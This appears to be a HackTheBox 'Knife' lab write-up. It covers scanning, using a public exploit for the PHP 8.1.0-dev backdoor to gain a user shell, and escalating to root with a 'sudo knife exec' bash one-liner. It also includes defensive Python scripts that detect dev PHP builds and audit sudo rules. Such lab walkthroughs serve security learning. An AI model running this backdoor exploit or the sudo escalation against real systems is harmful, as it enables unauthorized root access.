# HTB - Knife
## Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- -T4 10.10.10.242
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 10:02 EDT
Nmap scan report for 10.10.10.242
Host is up (0.043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
## Exploit
After not finding much else, I inspected the website's response headers in Burp Suite, which showed it was running a dev version of PHP.
After searching, I found that PHP 8.1.0-dev has a backdoor which was put there in a 2021 apache hack. I found a script that gets a shell through this backdoor:
https://www.exploit-db.com/exploits/49933
┌──(kali㉿kali)-[~]
└─$ python3 exploit_php.py
Enter the full host url:
http://10.10.10.242/
The shell worked and I got access as user 'james', which allowed me to read the user flag.
$ ls home
james
$ ls /home/james
user.txt
$ cat /home/james/user.txt
ad07732c7b1144f5f181e47c********
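The header check done by hand in Burp Suite above can be scripted. This is an added example in Python, not code from the writeup or from the exploit-db script: it parses a raw HTTP response, pulls the PHP version out of X-Powered-By or Server, and flags development snapshots such as the PHP/8.1.0-dev build this box advertised. The sample response is constructed for illustration.

```python
"""Fingerprint the PHP build advertised in HTTP response headers.
Added example, not from the original writeup: flags development snapshots
such as PHP/8.1.0-dev, the version this box advertised. The sample response
below is constructed for illustration."""
import re
from typing import Optional

PHP_VERSION_RE = re.compile(r"PHP/(\d+\.\d+\.\d+(?:-[A-Za-z0-9.]+)?)", re.IGNORECASE)

def parse_headers(raw_response: str) -> dict:
    """Map lower-cased header names to values, taken from the head of a raw response."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    headers = {}
    for line in head.splitlines()[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def php_version(headers: dict) -> Optional[str]:
    """Return the PHP version from X-Powered-By or Server, or None if not advertised."""
    for name in ("x-powered-by", "server"):
        match = PHP_VERSION_RE.search(headers.get(name, ""))
        if match:
            return match.group(1)
    return None

def is_dev_build(version: Optional[str]) -> bool:
    """Development snapshots carry a -dev suffix and have no place on a production host."""
    return version is not None and version.lower().endswith("-dev")

# Constructed sample response, modelled on the headers the box returned.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    version = php_version(parse_headers(SAMPLE_RESPONSE))
    print(f"PHP version: {version}, dev build: {is_dev_build(version)}")
```

Disabling `expose_php` in php.ini removes the X-Powered-By banner, but the fix that matters is not running a development snapshot at all.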
## Privilege Escalation
The first thing to do when looking to privesc on Linux is to see what your user can run with sudo. This showed me that the user can run the knife command as root without a password.
james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Because knife exec evaluates Ruby code, it can be used to open a TTY shell as root, which allowed me to get the root flag.
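The same `sudo -l` review can be automated for an audit. This is an added example in Python, not code from the writeup: it parses the text `sudo -l` prints, extracts each (run-as, NOPASSWD, command) rule and flags rules that hand the caller a code-evaluating tool as root, knife being one because `knife exec -E` runs Ruby. The KNOWN_CODE_RUNNERS map and the sample output are constructed for illustration.

```python
"""Audit `sudo -l` output for passwordless root rules on code-evaluating tools.
Added example, not from the original writeup. The KNOWN_CODE_RUNNERS map and
the sample output below are constructed for illustration."""
import re
from collections import namedtuple

# Binaries that evaluate caller-supplied code; the map itself is an assumption.
KNOWN_CODE_RUNNERS = {
    "/usr/bin/knife": "knife exec -E evaluates Ruby supplied on the command line",
    "/usr/bin/python3": "interpreter",
}
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")
SudoRule = namedtuple("SudoRule", "runas nopasswd command")

def parse_sudo_l(output: str) -> list:
    """Return the rules listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
        elif in_rules and (m := RULE_RE.match(line)):
            nopasswd = "NOPASSWD" in m.group("tags")
            for cmd in m.group("cmds").split(","):
                if cmd.strip():
                    rules.append(SudoRule(m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules

def risky_rules(rules: list) -> list:
    """(rule, reason) pairs for rules that run a known code runner as root."""
    out = []
    for r in rules:
        binary = r.command.split()[0]
        if r.runas in ("root", "ALL") and binary in KNOWN_CODE_RUNNERS:
            out.append((r, KNOWN_CODE_RUNNERS[binary]))
    return out

# Constructed sample, mirroring the `sudo -l` output shown above.
SAMPLE_SUDO_L = r"""Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

if __name__ == "__main__":
    for rule, why in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"({rule.runas}) NOPASSWD={rule.nopasswd} {rule.command}: {why}")
```

A rule like this should be replaced by a wrapper script that runs only the specific knife subcommands the user needs, or dropped entirely.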
james@knife:/$ sudo knife exec -E "exec '/bin/bash'"
sudo knife exec -E "exec '/bin/bash'"
id
uid=0(root) gid=0(root) groups=0(root)
cd home
cd ..
cd root
ls
delete.sh
root.txt
snap
cat root.txt
897d6db0dc46327655455952********